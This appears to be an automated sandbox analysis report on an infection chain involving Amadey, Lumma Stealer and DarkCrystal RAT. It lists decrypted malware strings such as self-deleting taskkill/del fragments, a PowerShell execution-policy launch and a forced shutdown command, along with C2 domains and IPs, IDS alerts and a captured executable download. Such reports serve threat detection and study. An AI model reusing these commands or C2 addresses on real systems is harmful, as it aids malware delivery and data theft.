Source: 00000001.00000003.1323941232.0000000005300000.00000004.00001000.00020000.00000000.sdmp	String decryptor: Doctor Web
Source: 00000001.00000003.1323941232.0000000005300000.00000004.00001000.00020000.00000000.sdmp	String decryptor: 360TotalSecurity
Source: 00000001.00000003.1323941232.0000000005300000.00000004.00001000.00020000.00000000.sdmp	String decryptor: Bitdefender
Source: 00000001.00000003.1323941232.0000000005300000.00000004.00001000.00020000.00000000.sdmp	String decryptor: Norton
Source: 00000001.00000003.1323941232.0000000005300000.00000004.00001000.00020000.00000000.sdmp	String decryptor: Sophos
Source: 00000001.00000003.1323941232.0000000005300000.00000004.00001000.00020000.00000000.sdmp	String decryptor: Comodo
Source: 00000001.00000003.1323941232.0000000005300000.00000004.00001000.00020000.00000000.sdmp	String decryptor: WinDefender
Source: 00000001.00000003.1323941232.0000000005300000.00000004.00001000.00020000.00000000.sdmp	String decryptor: 0123456789
Source: 00000001.00000003.1323941232.0000000005300000.00000004.00001000.00020000.00000000.sdmp	String decryptor: Content-Type: multipart/form-data; boundary=----
Source: 00000001.00000003.1323941232.0000000005300000.00000004.00001000.00020000.00000000.sdmp	String decryptor: ------
Source: 00000001.00000003.1323941232.0000000005300000.00000004.00001000.00020000.00000000.sdmp	String decryptor: ?scr=1
Source: 00000001.00000003.1323941232.0000000005300000.00000004.00001000.00020000.00000000.sdmp	String decryptor: Content-Type: application/x-www-form-urlencoded
Source: 00000001.00000003.1323941232.0000000005300000.00000004.00001000.00020000.00000000.sdmp	String decryptor: SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName
Source: 00000001.00000003.1323941232.0000000005300000.00000004.00001000.00020000.00000000.sdmp	String decryptor: ComputerName
Source: 00000001.00000003.1323941232.0000000005300000.00000004.00001000.00020000.00000000.sdmp	String decryptor: abcdefghijklmnopqrstuvwxyz0123456789-_
Source: 00000001.00000003.1323941232.0000000005300000.00000004.00001000.00020000.00000000.sdmp	String decryptor: -unicode-
Source: 00000001.00000003.1323941232.0000000005300000.00000004.00001000.00020000.00000000.sdmp	String decryptor: SYSTEM\CurrentControlSet\Control\UnitedVideo\CONTROL\VIDEO\
Source: 00000001.00000003.1323941232.0000000005300000.00000004.00001000.00020000.00000000.sdmp	String decryptor: SYSTEM\ControlSet001\Services\BasicDisplay\Video
Source: 00000001.00000003.1323941232.0000000005300000.00000004.00001000.00020000.00000000.sdmp	String decryptor: VideoID
Source: 00000001.00000003.1323941232.0000000005300000.00000004.00001000.00020000.00000000.sdmp	String decryptor: DefaultSettings.XResolution
Source: 00000001.00000003.1323941232.0000000005300000.00000004.00001000.00020000.00000000.sdmp	String decryptor: DefaultSettings.YResolution
Source: 00000001.00000003.1323941232.0000000005300000.00000004.00001000.00020000.00000000.sdmp	String decryptor: SOFTWARE\Microsoft\Windows NT\CurrentVersion
Source: 00000001.00000003.1323941232.0000000005300000.00000004.00001000.00020000.00000000.sdmp	String decryptor: ProductName
Source: 00000001.00000003.1323941232.0000000005300000.00000004.00001000.00020000.00000000.sdmp	String decryptor: CurrentBuild
Source: 00000001.00000003.1323941232.0000000005300000.00000004.00001000.00020000.00000000.sdmp	String decryptor: rundll32.exe
Source: 00000001.00000003.1323941232.0000000005300000.00000004.00001000.00020000.00000000.sdmp	String decryptor: "taskkill /f /im "
Source: 00000001.00000003.1323941232.0000000005300000.00000004.00001000.00020000.00000000.sdmp	String decryptor: " && timeout 1 && del
Source: 00000001.00000003.1323941232.0000000005300000.00000004.00001000.00020000.00000000.sdmp	String decryptor: && Exit"
Source: 00000001.00000003.1323941232.0000000005300000.00000004.00001000.00020000.00000000.sdmp	String decryptor: " && ren
Source: 00000001.00000003.1323941232.0000000005300000.00000004.00001000.00020000.00000000.sdmp	String decryptor: Powershell.exe
Source: 00000001.00000003.1323941232.0000000005300000.00000004.00001000.00020000.00000000.sdmp	String decryptor: -executionpolicy remotesigned -File "
Source: 00000001.00000003.1323941232.0000000005300000.00000004.00001000.00020000.00000000.sdmp	String decryptor: shutdown -s -t 0
Source: 00000001.00000003.1323941232.0000000005300000.00000004.00001000.00020000.00000000.sdmp	String decryptor: random
Source: 29.0.Rm3cVPI.exe.980000.0.unpack	String decryptor: galarona.bet/GKAns
Source: 29.0.Rm3cVPI.exe.980000.0.unpack	String decryptor: oreheatq.live/gsopp
Source: 29.0.Rm3cVPI.exe.980000.0.unpack	String decryptor: castmaxw.run/ganzde
Source: 29.0.Rm3cVPI.exe.980000.0.unpack	String decryptor: weldorae.digital/geds
Source: 29.0.Rm3cVPI.exe.980000.0.unpack	String decryptor: steelixr.live/aguiz
Source: 29.0.Rm3cVPI.exe.980000.0.unpack	String decryptor: advennture.top/GKsiio
Source: 29.0.Rm3cVPI.exe.980000.0.unpack	String decryptor: targett.top/dsANGt
Source: 29.0.Rm3cVPI.exe.980000.0.unpack	String decryptor: smeltingt.run/giiaus
Source: 29.0.Rm3cVPI.exe.980000.0.unpack	String decryptor: ferromny.digital/gwpd

Compliance

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\AppData\Local\Temp\22.exe	Unpacked PE file: 16.2.22.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\22.exe	Unpacked PE file: 19.2.22.exe.400000.0.unpack

Uses 32bit PE files

Source: SUAosT64HD.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source:	Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: apple.exe, 0000000E.00000003.1923045915.00000000068E1000.00000004.00000020.00020000.00000000.sdmp, apple.exe, 0000000E.00000003.1922478872.00000000060EE000.00000004.00000020.00020000.00000000.sdmp, apple.exe, 0000000E.00000002.1929624688.00000000008F3000.00000002.00000001.01000000.0000000C.sdmp, apple.exe, 0000000E.00000000.1920430499.00000000008F3000.00000002.00000001.01000000.0000000C.sdmp, apple.exe.11.dr, apple[1].exe.11.dr, 39pazbF[1].exe.11.dr
Source:	Binary string: C:\Users\1231123\Desktop\DDriver\x64\Release\DDriver.pdb source: ssisd.sys.14.dr

Source: C:\Users\user\AppData\Local\Temp\1021872001\3d9778a1ff.exe	File opened: C:\Users\user\Documents\desktop.ini	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1021872001\3d9778a1ff.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1021872001\3d9778a1ff.exe	File opened: C:\Users\user\AppData\Local\Temp	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1021872001\3d9778a1ff.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1021872001\3d9778a1ff.exe	File opened: C:\Users\user\AppData\Local	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1021872001\3d9778a1ff.exe	File opened: C:\Users\user\Desktop\desktop.ini	Jump to behavior

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.5:49717 -> 185.215.113.16:80
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.5:49719 -> 185.215.113.16:80
Source: Network traffic	Suricata IDS: 2856122 - Severity 1 - ETPRO MALWARE Amadey CnC Response M1 : 185.215.113.16:80 -> 192.168.2.5:49717
Source: Network traffic	Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49721
Source: Network traffic	Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49728
Source: Network traffic	Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49751
Source: Network traffic	Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49759
Source: Network traffic	Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49795
Source: Network traffic	Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 176.113.115.6:80 -> 192.168.2.5:49780
Source: Network traffic	Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49802
Source: Network traffic	Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49745
Source: Network traffic	Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49746
Source: Network traffic	Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49720
Source: Network traffic	Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49747
Source: Network traffic	Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49786
Source: Network traffic	Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49779
Source: Network traffic	Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49809
Source: Network traffic	Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49768
Source: Network traffic	Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49773
Source: Network traffic	Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49783
Source: Network traffic	Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49749
Source: Network traffic	Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49792
Source: Network traffic	Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49734
Source: Network traffic	Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49741
Source: Network traffic	Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49754
Source: Network traffic	Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49724
Source: Network traffic	Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49775
Source: Network traffic	Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49750
Source: Network traffic	Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49729
Source: Network traffic	Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49800
Source: Network traffic	Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49787
Source: Network traffic	Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49722
Source: Network traffic	Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49804
Source: Network traffic	Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49807
Source: Network traffic	Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49731
Source: Network traffic	Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49814
Source: Network traffic	Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49730
Source: Network traffic	Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49742
Source: Network traffic	Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49798
Source: Network traffic	Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49727
Source: Network traffic	Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49758
Source: Network traffic	Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49769
Source: Network traffic	Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49752
Source: Network traffic	Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49726
Source: Network traffic	Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49764
Source: Network traffic	Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49790
Source: Network traffic	Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49763
Source: Network traffic	Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49743
Source: Network traffic	Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49776
Source: Network traffic	Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49744
Source: Network traffic	Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49794
Source: Network traffic	Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49760
Source: Network traffic	Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49778
Source: Network traffic	Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49774
Source: Network traffic	Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49816
Source: Network traffic	Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49748
Source: Network traffic	Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49757
Source: Network traffic	Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49766
Source: Network traffic	Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49782
Source: Network traffic	Suricata IDS: 2800029 - Severity 1 - ETPRO EXPLOIT Multiple Vendor Malformed ZIP Archive Antivirus Detection Bypass : 176.113.115.7:80 -> 192.168.2.5:49797
Source: Network traffic	Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49791
Source: Network traffic	Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49765
Source: Network traffic	Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49755
Source: Network traffic	Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49820
Source: Network traffic	Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49777
Source: Network traffic	Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49825
Source: Network traffic	Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49827
Source: Network traffic	Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49823
Source: Network traffic	Suricata IDS: 2061135 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (oreheatq .live) : 192.168.2.5:53907 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49756
Source: Network traffic	Suricata IDS: 2061136 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (oreheatq .live) in TLS SNI : 192.168.2.5:49834 -> 172.67.172.183:443
Source: Network traffic	Suricata IDS: 2061136 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (oreheatq .live) in TLS SNI : 192.168.2.5:49839 -> 172.67.172.183:443
Source: Network traffic	Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49796
Source: Network traffic	Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49829
Source: Network traffic	Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49736
Source: Network traffic	Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49811
Source: Network traffic	Suricata IDS: 2061136 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (oreheatq .live) in TLS SNI : 192.168.2.5:49845 -> 172.67.172.183:443
Source: Network traffic	Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49831
Source: Network traffic	Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49753
Source: Network traffic	Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49835
Source: Network traffic	Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49818
Source: Network traffic	Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49842
Source: Network traffic	Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49838
Source: Network traffic	Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49856
Source: Network traffic	Suricata IDS: 2061136 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (oreheatq .live) in TLS SNI : 192.168.2.5:49858 -> 172.67.172.183:443
Source: Network traffic	Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49738
Source: Network traffic	Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49851
Source: Network traffic	Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49833
Source: Network traffic	Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49832
Source: Network traffic	Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49789
Source: Network traffic	Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49772
Source: Network traffic	Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49844
Source: Network traffic	Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49836
Source: Network traffic	Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49740
Source: Network traffic	Suricata IDS: 2061136 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (oreheatq .live) in TLS SNI : 192.168.2.5:49862 -> 172.67.172.183:443
Source: Network traffic	Suricata IDS: 2061136 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (oreheatq .live) in TLS SNI : 192.168.2.5:49849 -> 172.67.172.183:443
Source: Network traffic	Suricata IDS: 2061136 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (oreheatq .live) in TLS SNI : 192.168.2.5:49869 -> 172.67.172.183:443
Source: Network traffic	Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49857
Source: Network traffic	Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49872
Source: Network traffic	Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49892
Source: Network traffic	Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49785
Source: Network traffic	Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49761
Source: Network traffic	Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49848
Source: Network traffic	Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49885
Source: Network traffic	Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49867
Source: Network traffic	Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49878
Source: Network traffic	Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49870
Source: Network traffic	Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49887
Source: Network traffic	Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49864
Source: Network traffic	Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49861
Source: Network traffic	Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49884
Source: Network traffic	Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49781
Source: Network traffic	Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49877
Source: Network traffic	Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49853
Source: Network traffic	Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49874
Source: Network traffic	Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49875
Source: Network traffic	Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49868
Source: Network traffic	Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.5:49876 -> 5.252.155.176:80
Source: Network traffic	Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49859
Source: Network traffic	Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49882
Source: Network traffic	Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49890
Source: Network traffic	Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49880
Source: Network traffic	Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49888
Source: Network traffic	Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49895

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: galarona.bet/GKAns
Source: Malware configuration extractor	URLs: oreheatq.live/gsopp
Source: Malware configuration extractor	URLs: castmaxw.run/ganzde
Source: Malware configuration extractor	URLs: weldorae.digital/geds
Source: Malware configuration extractor	URLs: steelixr.live/aguiz
Source: Malware configuration extractor	URLs: advennture.top/GKsiio
Source: Malware configuration extractor	URLs: targett.top/dsANGt
Source: Malware configuration extractor	URLs: smeltingt.run/giiaus
Source: Malware configuration extractor	URLs: ferromny.digital/gwpd
Source: Malware configuration extractor	IPs: 185.215.113.16

Downloads executable code via HTTP

Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 28 Mar 2025 15:55:21 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Fri, 28 Mar 2025 15:06:50 GMTETag: "1dd000-631686b83b21b"Accept-Ranges: bytesContent-Length: 1953792Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d1 b6 42 53 95 d7 2c 00 95 d7 2c 00 95 d7 2c 00 81 bc 2f 01 98 d7 2c 00 81 bc 29 01 2f d7 2c 00 c7 a2 28 01 87 d7 2c 00 c7 a2 2f 01 83 d7 2c 00 c7 a2 29 01 cc d7 2c 00 a4 8b d1 00 97 d7 2c 00 81 bc 28 01 82 d7 2c 00 81 bc 2d 01 86 d7 2c 00 95 d7 2d 00 67 d7 2c 00 59 a2 25 01 94 d7 2c 00 59 a2 d3 00 94 d7 2c 00 59 a2 2e 01 94 d7 2c 00 52 69 63 68 95 d7 2c 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 23 01 bb 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 1d 00 f2 04 00 00 c0 01 00 00 00 00 00 00 90 4d 00 00 10 00 00 00 10 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 c0 4d 00 00 04 00 00 c6 f9 1d 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 e0 06 00 6b 00 00 00 00 d0 06 00 44 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 7b 4d 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 7b 4d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 c0 06 00 00 10 00 00 00 d6 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 44 03 00 00 00 d0 06 00 00 04 00 00 00 e6 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 e0 06 00 00 02 00 00 00 ea 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 d0 2b 00 00 f0 06 00 00 02 00 00 00 ec 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6c 64 6e 69 78 62 6d 74 00 c0 1a 00 00 c0 32 00 00 bc 1a 00 00 ee 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6c 74 79 78 76 67 61 61 00 10 00 00 00 80 4d 00 00 04 00 00 00 aa 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 90 4d 00 00 22 00 00 00 ae 1d 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$BS,,,/,)/,(,/,),,(,-,-g,Y%,Y,Y.,Rich,PEL#gM@M@Wk
